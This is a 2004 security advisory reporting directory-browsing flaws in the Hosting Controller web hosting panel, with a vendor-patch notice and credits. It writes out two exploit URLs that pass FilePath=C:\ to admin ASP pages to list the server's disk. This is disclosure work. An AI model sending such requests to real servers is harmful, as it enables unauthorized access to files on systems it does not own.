Hosting Controller

2004-12-06T00:00:00
ID SECURITYVULNS:DOC:7289
Type securityvulns
Reporter Securityvulns
Modified 2004-12-06T00:00:00

Description

                                   -= Security  Advisory =-

Advisory Information

Software Package : Hosting Controller Vendor Homepage : http://www.hostingcontroller.com Platforms : Windows based servers Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 1.4 ) Vendor Contacted : 12/5/2004 Release Date: : 12/7/2004

Summary

Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. Hosting Controller has a security flaw which allows attackers to browse any file and any directory on that server.

Details

Vulnerability - Directories Browsing files on the system. Foolish vulnerability:

1)This vulnerability is on the admin/mail/Statsbrowse.asp and attackers can view the Harddisk by using this file. Login with your account http://www.yoursite.com/admin Now you see http://www.yoursite.com/admin/main.asp Change this url to http://www.yoursite.com/admin/mail/Statsbrowse.asp? FilePath=c:\&Opt=3&level=1&upflag=0

2)This vulnerability is on the admin/iis/Generalbrowse.asp and attackers can view the Harddisk by using this file. Login with your account http://www.yoursite.com/admin Now you see http://www.yoursite.com/admin/main.asp Change this url to <br/> http://www.yoursite.com/admin/iis/Generalbrowse.asp?FilePath=C:\

Solution

The vender was notified, they have released a patch. Update Your software

Credits

Discovered on May 6, 2004 by (\/) Mouse Mouse@Shabgard.org Additional Research: s7az2mm and bl2k http://Shabgard.org

References

http://isun.Shabgard.org/hc.html http://isun.Shabgard.org/hc.txt